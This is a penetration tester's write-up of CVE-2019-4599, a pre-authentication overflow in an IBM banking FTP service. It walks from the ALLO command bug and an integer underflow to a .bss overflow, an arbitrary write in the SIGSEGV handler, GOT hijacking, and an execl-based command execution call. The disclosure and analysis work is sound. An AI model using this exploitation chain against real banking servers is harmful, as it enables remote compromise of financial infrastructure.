Pentesting a banking FTP service

Introduction

A classical penetration test requires the skills to assess a large variety of weaknesses, most of them belonging to common bug classes. Memory corruptions are rarely exploited during penetration tests, for two reasons: they can be risky (you do not want to crash a production system) and time-consuming (if you have to develop or adapt an exploit). It is also rather uncommon to have the opportunity to exploit a known memory corruption bug with a public script, because both vendors and users tend to take patching very seriously. Nevertheless, these weaknesses may give attackers powerful primitives, such as remote command execution or theft of secrets.

Furthermore, in the banking world, this kind of issue is bound to provoke a mighty fuss, especially if no patch is ever made available. Nonetheless, being able to detect memory corruptions during security assessments may avert technical or economic disasters, if only by getting the vulnerable service decommissioned.

Finally, let's be honest: legacy software is almost never audited. Most of it is decommissioned whenever possible, and what remains is almost never tested. The reason is simple: this kind of software is often very delicate to patch, so users avoid spending time on repeated vulnerability assessments. Typically, the first audit is supposed to pinpoint the most evident weaknesses. Memory corruption bugs that do not lead to a crash will almost surely not be exploited, even when they are detected.

Consequently, I invite you to follow my analysis of CVE-2019-4599, a path I had to take during a classical penetration test. I was not expecting such a surprise at first :)

The target

IBM Sterling PeSIT FTP service is part of a complete transaction environment, aimed at syncing files between large financial entities in order to track, for instance, foreign banks' cash withdrawal. This principle is called teleclearance.

Of course, the usage of those files, as well as their content, can vary, yet in the end they are all transferred using some exchange protocol. While international standards recommend using SWIFT, French banks have been using a protocol named PeSIT since the 1980s.

Additionally, an FTP server is included in the Connect:Express software suite. It is used as a fallback protocol in case a PeSIT link cannot be established between two French organizations.

Therefore, below are the main reasons for attacking the FTP server:

- When used by a bank, it listens on the internet to communicate with other banking entities, although banks typically position the service behind an IPsec tunnel
- The FTP protocol itself is one of the best-known protocols, and its parts are described in several RFCs
- More importantly, a penetration test is more challenging with an exploit writing phase!

The second point is not really relevant, since the implementation does not seem to follow the part of the specification that happens to be critical for the exploitation (RFC 959, pp. 30-31).

Static analysis

Since the binary is closed source, let's start by disassembling it. Thankfully, the binary is not stripped and most functions are labeled in either French or French/English mix. Looking at the main() function, we can see that local arguments and flags are handled using getopt() as shown in the following screenshot:

Like any typical server, the binary starts by listening for incoming TCP connections. Once a connection has been established from a remote peer, the process is fork()'ed and receive_commande() handles the TCP payload sent by the client. This is our main (remote) entry point:

receive_commande() basically invokes two functions:

- TCP_RECV(): calls recv()
- analyse_commande(): dispatches the FTP command to the appropriate handler

Let's first analyze TCP_RECV() . Here is a simplified version:

    void *TCP_RECV(int mode)
    {
        int fd;
        int cur;

        if (mode == 2) {
            // load "more data" (e.g. partial file upload)
            cur = lit_parm->buf_lg;
            fd = sock_dtp;
        } else {
            cur = 0;          // [0]
            fd = sock_dcp;    // incoming connection socket
        }

        // [1]
        lit_parm->buf_lg = recv(fd, &lit_parm->buf[cur], lit_parm->max_len - cur, 0);

        if (lit_parm->buf_lg > 0) {
            if (mode == 1) {
                if (strf == 2) {
                    lit_parm->buf_lg -= 2;    // [2]
                } else {
                    // ...
                }
            } else {
                // ...
            }
        }
        // ...
    }

In other words, it fills the following struct lit_parm_t structure:

    struct lit_parm_t {
        char *buf;      // pointer to user supplied data
        int buf_lg;     // length returned by recv() minus 2
        // ...
        int max_len;    // max buffer length
    };

In particular, lit_parm->buf holds all the data read from the client by recv() at [1], written from offset cur == 0 (set at [0]).

One might notice a very "curious" operation in [2]. Yes, the lit_parm->buf_lg is decremented by 2. Honestly, I don't know why this statement exists but it actually leads to a bug (more on this later).

lit_parm itself is a global variable pointing to data allocated on the heap in init() (invoked at start up before fork() ):

    void init()
    {
        // ...
        input_net = malloc(130976);
        // ...
        lit_parm = calloc(1uLL, 32uLL);
        lit_parm->buf = input_net;
        lit_parm->buf_lg = 130976;
        lit_parm->max_len = 130976;
        // ...
    }

In turn, input_net is also a global variable pointing to the heap. One might notice, that "130976" looks like a MAX_INPUT_SIZE for the buffer.

Once the data has been received with TCP_RECV() , receive_commande() invokes analyse_commande() which is the main command dispatcher. analyse_commande() distinguishes two sets of commands:

pre-authentication: HELP, STAT, USER/PASS, ALLO

post-authentication: all the other commands

From an attack surface point of view, we either need to find a vulnerability in the pre-authentication commands, or find an authentication bypass and then a vulnerability in the post-authentication commands. In the latter case, we would need "two vulnerabilities". That looks like more "work", and having a pre-auth bug is sexier!

After a rough look at the different pre-auth commands, the focus has been set on the ALLO command.

ALLO command handler

The ALLO command (for ALLOcate) is a command that can be called in pre-authentication mode. It is used to allocate a sufficient space prior to a file upload. Typically, the next command shall be STOR for instance.

According to RFC 959, the expected grammar is:

ALLO <SP> <decimal-integer> [<SP> R <SP> <decimal-integer>] <CRLF>

Once data has been received in TCP_RECV() (hence both lit_parm->buf and lit_parm->buf_lg have been filled), the ALLO command handler (invoked from analyse_commande()) tries to do the following:

1. Find the length of <decimal-integer> (character-wise)
2. If <decimal-integer> is actually a number, copy the user-provided data (i.e. <decimal-integer>) into the rem_file buffer

Let's check the implementation:

    int i;

    // find the number of characters of "<decimal-integer>"
    // (stop at the first space or at the end of the data)
    // [0]
    for (i = 0; lit_parm->buf_lg - 5 > i && lit_parm->buf[5 + i] != ' '; ++i) { }

    // [1]
    if (verif_num(i, (lit_parm->buf + 5))) {
        if (lit_parm->buf_lg - 5 < i)
            copy_len = i - 1;
        else
            copy_len = i;

        // [2]
        memcpy(rem_file, (lit_parm->buf + 5), copy_len);
        rem_file[copy_len] = 0;
        // ...
    }

In order to make things simpler, let's call the string located at 5 bytes past lit_parm->buf : PAYLOAD.

So, the variable i is set to the length of PAYLOAD in [0]. Then, there is a check that PAYLOAD is only composed of digits with verif_num() in [1]. Finally, the buffer rem_file is filled with PAYLOAD of size copy_len in [2].

One might immediately notice that there is no length check before the memcpy() in [2]. It copies user-controlled data (PAYLOAD) of size copy_len into rem_file. The global variable rem_file itself is stored in the .bss as a 256-byte character array.

In other words, passing the following command leads to a buffer overflow in the .bss:

    ALLO 111...<252 times>...111111
                                  ^ start overflowing on the next variable in the .bss

At this point, the only "restriction" on PAYLOAD, is that it must only contain digits as enforced by verif_num() . The latter returns true if PAYLOAD is only composed of digits OR if i is zero.
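To make the missing bounds check concrete, here is a minimal Python sketch of the copy. It is only a toy model: the 8-byte neighbour variable and the flat layout are assumptions made for illustration, not the real .bss layout of the binary.

```python
# Toy model of the .bss: rem_file (256 bytes) followed by one neighbour global.
# NEXT_VAR_SIZE and the layout are illustrative assumptions.
REM_FILE_SIZE = 256
NEXT_VAR_SIZE = 8


def allo_copy(payload: bytes) -> bytearray:
    """Mimic memcpy(rem_file, PAYLOAD, copy_len); rem_file[copy_len] = 0."""
    bss = bytearray(REM_FILE_SIZE + NEXT_VAR_SIZE)
    copy_len = len(payload)  # never compared against REM_FILE_SIZE
    if copy_len + 1 > len(bss):
        raise ValueError("payload too large for this toy model")
    bss[0:copy_len] = payload
    bss[copy_len] = 0
    return bss


bss = allo_copy(b"1" * 260)
neighbour = bytes(bss[REM_FILE_SIZE:])
print(neighbour)  # the first four bytes of the neighbour are now '1' characters
```

With 260 digits, the last four characters land in whatever follows rem_file, which is the situation described above.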

This could look like the "big win" here yet "big win" does not equal "quick win" :-).

In fact, being restricted to "digit only" characters leads to harder exploitation. In the next section, we will show how to bypass this restriction and overflow the rem_file buffer with almost arbitrary data.

Bypassing verif_num()

In the previous section, we saw that we can trigger a buffer overflow on the .bss but it came with a limitation: our PAYLOAD was restricted to digit characters.

The Implementation

First, let's have a look at the verif_num() implementation:

    bool verif_num(int ctr, char *test_char)
    {
        int i;

        for (i = 0; i < ctr && isdigit(test_char[i]); ++i) { }
        return i == ctr;
    }

In order to pass the check, the string test_char must be composed of digit characters up to ctr characters.

Furthermore, if ctr is set to zero, verif_num() will always return true.
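A direct Python port of the function makes both properties easy to check. This is a sketch: the extra `i < len(test_char)` guard is an addition needed because Python bytes are bounds-checked, and the digit test is restricted to ASCII 0-9 like the C isdigit() in the default locale.

```python
def verif_num(ctr: int, test_char: bytes) -> bool:
    """Port of verif_num(): True if the first ctr bytes are ASCII digits."""
    i = 0
    # The len() guard is not in the original; C would simply keep reading.
    while i < ctr and i < len(test_char) and 0x30 <= test_char[i] <= 0x39:
        i += 1
    return i == ctr


print(verif_num(3, b"123"))       # digits only
print(verif_num(3, b"12a"))       # a non-digit stops the loop early
print(verif_num(0, b"anything"))  # ctr == 0: the loop never runs
```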

Back to the ALLO handler code, we saw that verif_num() is invoked with its ctr parameter set to the i variable, which is computed here:

for ( i = 0 ; lit_parm -> buf_lg - 5 > i && lit_parm -> buf [ 5 + i ] != ' ' ; ++ i ) { }

and called here:

if ( verif_num ( i , ( lit_parm -> buf + 5 ))) { ... }

Basic Test Cases

Alright, let's analyze this part with some practical data. Here are our test cases:

| #case | lit_parm->buf | lit_parm->buf_lg | i | verif_num() | copy_len | comment |
| ----- | ------------- | ---------------- | - | ----------- | -------- | ----------------------- |
| 0 | 'ALLO ' | 5 | 0 | true | 0 | with one space |
| 1 | 'ALLO a' | 6 | 1 | false | n/a | |
| 2 | 'ALLO  1' | 7 | 0 | true | 0 | two spaces before digit |
| 3 | 'ALLO  a' | 7 | 0 | true | 0 | two spaces before char |
| 4 | 'ALLO 1' | 6 | 1 | true | 1 | |
| 5 | 'ALLO 1 ' | 7 | 1 | true | 1 | one space after |
| 6 | 'ALLO 12' | 7 | 2 | true | 2 | |

As we can see in cases #0, #1, #4, #5 and #6, verif_num() behaves as expected and the i value is correctly set. In turn, copy_len equals i.
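These rows can be replayed with a small Python model of the handler. It is a sketch that assumes buf_lg is simply the number of bytes received (no adjustment), as this first set of test cases does; the function names mirror the decompiled ones but the code is a re-implementation, not the original.

```python
def verif_num(ctr: int, data: bytes) -> bool:
    i = 0
    while i < ctr and i < len(data) and 0x30 <= data[i] <= 0x39:
        i += 1
    return i == ctr


def allo_handler(buf: bytes, buf_lg: int):
    """Return (i, verif_num result, copy_len or None) for one ALLO command."""
    i = 0
    while buf_lg - 5 > i and buf[5 + i] != 0x20:  # stop at first space / end
        i += 1
    if not verif_num(i, buf[5:]):
        return i, False, None
    copy_len = i - 1 if buf_lg - 5 < i else i
    return i, True, copy_len


for cmd in (b"ALLO ", b"ALLO  1", b"ALLO  a", b"ALLO 1", b"ALLO 1 ", b"ALLO 12"):
    print(cmd, allo_handler(cmd, len(cmd)))
```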

However, looking at case #2 and #3, where two spaces are inserted after the ALLO command, we see that i is always set to zero, thus verif_num() also returns true!

That is, we reach the following code:

    // [0]
    if (lit_parm->buf_lg - 5 < i)
        copy_len = i - 1;    // <---- unreachable code ?!
    else
        copy_len = i;

    // [1]
    memcpy(rem_file, lit_parm->buf + 5, copy_len);

Back to case #3, we see that our payload can be ALLO<sp><sp>a or ALLO<sp><sp>aaaaaaa... (two spaces). In other words, by using the "two spaces trick" we can put some arbitrary data in PAYLOAD.

Alas, in those cases, i is also set to zero, so copy_len is set to zero too! An overflow of 0 bytes hardly deserves the name!

Instead, looking back to the line [0] in the previous snippet, it seems that this condition can never be true as lit_parm->buf_lg has a minimum value of 5... or... does it?

Reconsidering the Test Cases

Remember TCP_RECV() exposed earlier? Yes, there was a "curious line" after the call to recv() :

    lit_parm->buf_lg = recv(fd, &lit_parm->buf[cur], lit_parm->max_len - cur, 0);
    // ...
    lit_parm->buf_lg -= 2;    // <---- what the hell ?!

So yeah, our previous test cases are wrong, let's rewrite them!

Back to the computation of i, we see that if lit_parm->buf_lg is less than 5, then i will always be set to zero (the for loop does not iterate). Hence, verif_num() always returns true as well!

| #case | lit_parm->buf | lit_parm->buf_lg | i | verif_num() | copy_len | comment |
| ----- | ------------- | ---------------- | - | ----------- | ---------- | ----------------------- |
| 0 | 'ALLO ' | 3 | 0 | true | 0xffffffff | with one space |
| 1 | 'ALLO a' | 4 | 0 | true | 0xffffffff | |
| 2 | 'ALLO  1' | 5 | 0 | true | 0 | two spaces before digit |
| 3 | 'ALLO  a' | 5 | 0 | true | 0 | two spaces before char |
| 4 | 'ALLO 1' | 4 | 0 | true | 0xffffffff | |
| 5 | 'ALLO 1 ' | 5 | 0 | true | 0 | one space after |
| 6 | 'ALLO 12' | 5 | 0 | true | 0 | |

In other words, if our PAYLOAD has size of zero or one character (no matter what), copy_len is set to 0xffffffff.

This is an INT UNDERFLOW baby, one that leads to a huge memcpy() on the .bss!

We might benefit from it, yet it raises two issues:

- Overwriting 0xffffffff bytes starting from the .bss will certainly crash the process
- Can we actually control the data (i.e. the PAYLOAD) without being limited to zero or one byte?
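The wrap-around can be reproduced with a short Python model. This is a sketch under two assumptions: buf_lg is the received length minus 2, as left by TCP_RECV(), and the resulting copy_len is viewed as a 32-bit unsigned value, which is how the tables above display it.

```python
def verif_num(ctr: int, data: bytes) -> bool:
    i = 0
    while i < ctr and i < len(data) and 0x30 <= data[i] <= 0x39:
        i += 1
    return i == ctr


def allo_copy_len(received: bytes):
    """copy_len computed by the ALLO handler, or None if verif_num() fails."""
    buf_lg = len(received) - 2  # the "-= 2" applied in TCP_RECV()
    i = 0
    while buf_lg - 5 > i and received[5 + i] != 0x20:
        i += 1
    if not verif_num(i, received[5:]):
        return None
    copy_len = i - 1 if buf_lg - 5 < i else i  # i - 1 == -1 when i == 0
    return copy_len & 0xFFFFFFFF  # view the signed int as 32-bit unsigned


for cmd in (b"ALLO ", b"ALLO a", b"ALLO 1", b"ALLO 12"):
    print(cmd, hex(allo_copy_len(cmd)))
```

Only the commands whose PAYLOAD is zero or one byte long take the `i - 1` branch.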

Abusing Uninitialized Memory

Back to the memcpy() called in the ALLO command handler, we saw that we can trigger a huge buffer overflow on rem_file (located in the .bss section). The code is:

memcpy ( rem_file , lit_parm -> buf + 5 , copy_len );

As a reminder, lit_parm->buf is set and only set in recv() , that is, user-controlled data:

lit_parm -> buf_lg = recv ( fd , & lit_parm -> buf [ cur ], lit_parm -> max_len - cur , 0 );

One thing to note is that lit_parm->buf (initialized in init() before the fork() ) is NEVER RESET between each recv() call! Let's exploit this behavior to overflow the rem_file buffer with arbitrary data.

Basically, the exploitation strategy becomes:

1. Send <5 bytes><ARBITRARY_DATA>: this sets the data in lit_parm->buf
2. Send ALLO<space><0 or 1 arbitrary byte>: this only overwrites the first 5 or 6 bytes of lit_parm->buf and leaves the rest of the buffer untouched

Of course, we can only control the data up to 130971 (130976 - 5) bytes. This is because of the lit_parm->max_len restriction.
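The two-step strategy can be modelled in a few lines of Python. This is a simplified sketch: tcp_recv() below is a stand-in for TCP_RECV() in the cur == 0 case, and the 64-byte marker is an arbitrary choice for the demonstration.

```python
MAX_LEN = 130976
input_net = bytearray(MAX_LEN)  # allocated once in init(), never cleared


def tcp_recv(data: bytes) -> int:
    """Stand-in for TCP_RECV(): write at offset 0, return the adjusted buf_lg."""
    n = min(len(data), MAX_LEN)
    input_net[0:n] = data[:n]
    return n - 2


# Step 1: any 5 bytes followed by the data we want to keep in the buffer.
tcp_recv(b"XXXXX" + b"A" * 64)
# Step 2: a short ALLO command only rewrites the first 5 bytes.
buf_lg = tcp_recv(b"ALLO ")

print(buf_lg)
print(bytes(input_net[:12]))  # the command, then data left over from step 1
```

The bytes located 5 bytes into the buffer, which is exactly where the ALLO handler reads PAYLOAD from, still come from the first message.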

Looking at the memory layout of the process, this will overwrite the whole .bss section before hitting a NULL page and provoking a segfault!

That's one issue solved! There is one more though: how to exploit the fact that the huge overflow (0xffffffff bytes) will provoke a segfault?

Dealing with Huge Overflow

Generally, when a buffer overflow bug overwrites a very large portion of contiguous (virtual) memory, there is a "high probability" that it will provoke a page fault (trying to write to non-mapped memory and/or read-only pages). In those cases, the kernel sends a SIGSEGV signal to the process, which is generally killed.

However, looking at the init() function, we see that a lot of various signal handlers are set up:

    puts("init: ***** signals caught");
    signal(1, 1);
    signal(2, sig_fin);
    signal(3, sig_fin);
    signal(4, sig_fin);
    signal(5, 1);
    signal(6, sig_fin);
    signal(8, sig_fin);
    signal(7, sig_fin);
    signal(11, sig_fin);    // SIGSEGV
    signal(31, sig_fin);
    signal(13, 1);
    signal(14, 1);
    signal(15, sig_fin);
    signal(20, 1);
    signal(17, sig_chld);
    signal(21, 1);
    signal(22, 1);
    signal(29, 1);
    signal(10, sig_usr1);
    signal(12, sig_usr2);

Therefore, the binary binds a signal handler for the SIGSEGV signal: sig_fin() . In other words, if our overflow provokes a SIGSEGV during the call to memcpy() , the execution flow is redirected to sig_fin() .
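Since the decompiler only shows raw numbers, a few lines of Python help to read the list. This is a convenience sketch: the names are resolved for the platform the script runs on, so they only match the target when it uses the same numbering (Linux x86-64 is assumed here), and reading the handler value 1 as SIG_IGN is likewise an assumption based on the usual glibc definition.

```python
import signal

TO_SIG_FIN = [2, 3, 4, 6, 8, 7, 11, 31, 15]  # registered with sig_fin
VALUE_ONE = [1, 5, 13, 14, 20, 21, 22, 29]   # registered with the value 1


def name_of(signum: int) -> str:
    """Symbolic name of a signal number on the current platform."""
    try:
        return signal.Signals(signum).name
    except ValueError:
        return "signal %d" % signum


print("sig_fin :", [name_of(n) for n in TO_SIG_FIN])
print("ignored?:", [name_of(n) for n in VALUE_ONE])
```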

Leveraging Arbitrary write primitive

As shown above, a single handler is registered for several of the signals that the process may receive. Let us see what sig_fin(), the handler function, does in this crude pseudo-code view:

    *(trfpar + 235) = 8000;
    if (strf == 1) {
        v3 = e_msg_gtrf;
        *e_msg_gtrf->gap0 = "01";
        v3->gap0[2] = '4';
    } else {
        e_msg_gtrf_ = e_msg_gtrf;
        *e_msg_gtrf->gap0 = 14641;
        e_msg_gtrf_->gap0[2] = 54;
    }
    memcpy(e_msg_gtrf->log_buf, trfpar, 1780uLL);    // <---- HERE
    v5 = *env_monit;
    send_tomqueue(*env_monit, *(env_monit + 8));

What we notice here is an explicit call to the GLIBC memcpy() function. The source and destination parameters are global variables that we can overwrite with the huge buffer overflow. Ideally, e_msg_gtrf->log_buf would be clobbered to point to the zone we wish to write to, and the new value of trfpar would be a pointer to the source data to be copied.

As shown below, the variables we need to overwrite are located after rem_file , which is good news for us:

We conclude it is possible to control the first two parameters in the memcpy() call!

Here is a simplified schema of the BSS overwrite right before the Segmentation Fault, hence the call to sig_fin()
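The resulting write-what-where can be sketched with a toy address space in Python. Everything about the layout is hypothetical: the positions of the two pointers right after rem_file, the LOG_BUF_OFF offset and the chosen addresses are placeholders, and only the memcpy() of sig_fin() is modelled.

```python
import struct

MEM = bytearray(0x4000)  # toy address space, not the real process memory
REM_FILE = 0x0000        # overflowed buffer (256 bytes)
TRFPAR_PTR = 0x0100      # hypothetical location of the trfpar pointer
E_MSG_PTR = 0x0108       # hypothetical location of the e_msg_gtrf pointer
LOG_BUF_OFF = 0x10       # hypothetical offset of log_buf in the structure
COPY_SIZE = 1780


def read_ptr(addr: int) -> int:
    return struct.unpack_from("<Q", MEM, addr)[0]


def overflow(payload: bytes) -> None:
    """The huge memcpy() into rem_file, truncated to the toy memory."""
    MEM[REM_FILE:REM_FILE + len(payload)] = payload


def sig_fin() -> None:
    """Only the memcpy(e_msg_gtrf->log_buf, trfpar, 1780) of the handler."""
    src = read_ptr(TRFPAR_PTR)
    dst = read_ptr(E_MSG_PTR) + LOG_BUF_OFF
    MEM[dst:dst + COPY_SIZE] = MEM[src:src + COPY_SIZE]


WHAT, WHERE = 0x0200, 0x3000
payload = b"A" * 256 + struct.pack("<QQ", WHAT, WHERE - LOG_BUF_OFF)
payload = payload.ljust(WHAT, b"\x00") + b"W" * COPY_SIZE
overflow(payload)
sig_fin()
print(bytes(MEM[WHERE:WHERE + 8]))
```

The source data lives inside the overflowed region itself, which is why controlling both pointers is enough.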

Hunting the Arbitrary Execution Primitive

Alright, so far we know that we have an arbitrary write of exactly 1780 bytes. How can we abuse it to take control of the execution flow? We saw earlier that the shutdown function sig_fin() was the key to exploiting the service. One requirement is worth stressing if we want a reliable and fast exploit: since there is only one chance to control the execution flow before the process ends, the written data must lead directly to command execution if at all possible.

Ideally, we would like to call a function like system() with a controlled parameter that would allow us to execute a reverse shell (connect-back). Alas, system() is not imported by the binary.

Instead, looking at various imported symbols, we figured out that only execl() was available. As a reminder, it has the following signature:

int execl ( const char * path , const char * arg , ...);

execl() needs more parameters under our control: four, to spawn a remote shell... We will have to work around this issue. In the binary, execl() is only invoked in the r_exit() function, which is called by the "parent process" during program exit.

We have no choice but to find a way to have execl() called with controlled parameters.

Exploiting the bug

One major pitfall is the copy size of the write-what-where (0x6f4 = 1780 bytes), since it is a hardcoded value. To avoid unpleasant behaviors from the process, an exploit writer may aim to overwrite only the last addresses in the .got section.

Fortunately for us - and since fork() is called upon every incoming connection -, a crash will not disrupt the parent service so we can let the process crash after we obtain the mighty shell.

Before exploiting for real, let's check the enabled protections for this binary:

Complete memory randomization and Read-Only Relocations (RELRO) are not enabled at all. As predicted, that makes the Global Offset Table an ideal victim for a good old control flow hijacking, and since the .bss section is mostly under our control, we may use it to store payloads. All we have to do is overwrite the .got entry of a GLIBC function that is called right after the arbitrary copy with a known address that we control. Easy peasy!

As said earlier, it is safer to overwrite as few entries as possible, to reduce the chances of the program crashing or misbehaving. Overwriting only the last entries helps.

Following the code of the segfault handler and confronting it with the .got candidates may help. What about send_tomqueue(), which is called right after the memcpy() call?

    memcpy(e_msg_gtrf->log_buf, trfpar, 1780uLL);
    v5 = *env_monit;
    send_tomqueue(*env_monit, *(env_monit + 8));

time() appears to be a viable candidate since it is among the first functions executed after send_tomqueue() is invoked by sig_fin(). Hijacking it would hand us the execution flow quickly. Unfortunately, time() does not carry any useful parameter; using it directly may undermine the exploit's reliability.

However, we should keep in mind that most of the .bss is under our control, and that the software is a state machine that pushes and pulls data variables that are defined globally. The only requirement is to have controlled buffer pointers in the function parameters dedicated registers (RDI, RSI, RDX etc.).

After a quick review, one function looks rather handy and adequate: TCP_SEND() .

As shown above, env_param and sock_dcp are used here by send(), which sits among the last entries of the Global Offset Table. Luckily, env_param lies at 0x644778 whereas rem_file, the buffer that we initially overflowed in the .bss, lies at 0x63AF60. This means env_param can be overwritten 38936 bytes past the beginning of our buffer.
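The offset arithmetic is easy to get wrong by hand, so here is a small Python helper that derives it from the two addresses. The helper names and the MARKER bytes are illustrative only; the limit of 130971 controlled bytes comes from the max_len restriction discussed earlier.

```python
REM_FILE_ADDR = 0x63AF60
ENV_PARAM_ADDR = 0x644778
MAX_CONTROLLED = 130976 - 5  # bytes of the overflow we actually control


def offset_in_payload(target_addr: int) -> int:
    """Distance from the start of rem_file to target_addr."""
    off = target_addr - REM_FILE_ADDR
    if not 0 <= off < MAX_CONTROLLED:
        raise ValueError("target is outside the controlled part of the overflow")
    return off


def place(payload: bytearray, target_addr: int, data: bytes) -> None:
    """Write data at the payload position that will land on target_addr."""
    off = offset_in_payload(target_addr)
    payload[off:off + len(data)] = data


payload = bytearray(MAX_CONTROLLED)
place(payload, ENV_PARAM_ADDR, b"MARKER")
print(offset_in_payload(ENV_PARAM_ADDR), hex(offset_in_payload(ENV_PARAM_ADDR)))
```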

Also, to avoid losing the flow or suffering unexpected crashes, we need to neutralize the .got entries placed after send() by pointing them to a ret instruction. This turns any unexpected call to an imported function into a no-op that returns to our normal flow.

To sum up, time@.got should be clobbered to point to TCP_SEND(), which calls send(controlled_param1, controlled_param2, controlled_param3), and send@.got should be rewritten so that calling send() results in calling execl@.plt instead. execl() is imported from GLIBC because the program function r_exit() uses it.
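The chain can be pictured with a Python dictionary standing in for the Global Offset Table. This is purely a model of the control flow: the stub functions only record which call was reached, and the three globals p1, p2 and p3 are hypothetical names for the values that TCP_SEND() passes to send().

```python
calls = []  # records which "library" function was really reached


def libc_time():
    calls.append(("time", ()))


def libc_send(a, b, c):
    calls.append(("send", (a, b, c)))


def libc_execl(path, arg0, arg1):
    calls.append(("execl", (path, arg0, arg1)))


bss = {"p1": 4, "p2": b"220 ready", "p3": 9}   # hypothetical globals
got = {"time": libc_time, "send": libc_send}    # toy Global Offset Table


def TCP_SEND(*_ignored):
    # Loads its arguments from globals, then calls send() through the GOT.
    return got["send"](bss["p1"], bss["p2"], bss["p3"])


def send_tomqueue():
    got["time"]()  # first imported function reached after the memcpy()


def arbitrary_write():
    bss.update(p1="/usr/bin/perl", p2="/usr/bin/perl", p3="-e[CMD]")
    got["time"] = TCP_SEND
    got["send"] = libc_execl


send_tomqueue()    # normal behaviour
arbitrary_write()  # effect of the 1780-byte copy
send_tomqueue()    # hijacked behaviour
print(calls)
```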

The final call should be as such:

    execl("/bin/sh",     /* path    */
          "/bin/sh",     /* argv[0] */
          "-c",          /* argv[1] */
          "echo win")    /* argv[2] */

Hang on chingón...

Only three parameters are controlled when the call to send() is issued, whereas the call above needs four. Still, there is no real need to look for another function call giving total control over the parameters in order to obtain command execution. Indeed, this constraint comes from the shell, which expects the -c option and the command string as two distinct arguments... whereas other language interpreters accept the option and its code glued together in a single argument.

Thus, using python -c or perl -e with the code attached directly to the option should work, since execl() does not go through a shell to spawn executable files.

The command execution could then be achieved by using:

execl ( "/usr/bin/perl" , "/usr/bin/perl" , "-e[CMD]" )
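The "glued option" behaviour can be checked locally without any shell involved. The sketch below uses the running Python interpreter instead of perl, simply because it is guaranteed to be present; subprocess.run() with a list executes the program directly, so the argument vector has the same shape as the execl() call above.

```python
import subprocess
import sys


def run_glued(code: str) -> str:
    """Run an interpreter with the option and its code in ONE argument."""
    argv = [sys.executable, "-c" + code]  # e.g. ["python", "-cprint('win')"]
    done = subprocess.run(argv, capture_output=True, text=True, check=True)
    return done.stdout.strip()


print(run_glued("print('win')"))
```

Path, argv[0] and a single option argument: three values are enough to run arbitrary code.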

Conclusion

Due to its lack of binary protections, it was possible to exploit this software during a penetration test assignment. A properly mitigated binary would have forced us to find another bug for leaking memory addresses, or to poison the .bss section much more delicately. It would also have required another technique to achieve code execution, since the Global Offset Table would be read-only.

For instance, since new client sessions are fork()'ed into a new process whose memory segments sit at the same place as in the parent, one could find the base address by attempting to write at many places and tracking crashes. Once the randomization is defeated, several techniques, such as overwriting __exit_funcs, lead to execution flow hijacking. It is however probable that a more complex payload execution technique, such as stack pivot + ROP, would be required.

A few other memory corruption bugs might still be exploitable depending on the context, since this kind of application is almost never audited by external researchers. Plus, since the exploit was written during a penetration testing assessment, the provided solution might not be the best one due to time requirements.

Note: A patch was issued to remediate the issue a few months ago. Is it convincing? Maybe :)

Demo

Appendix

Exploit code using python2 pwntools (sorry!)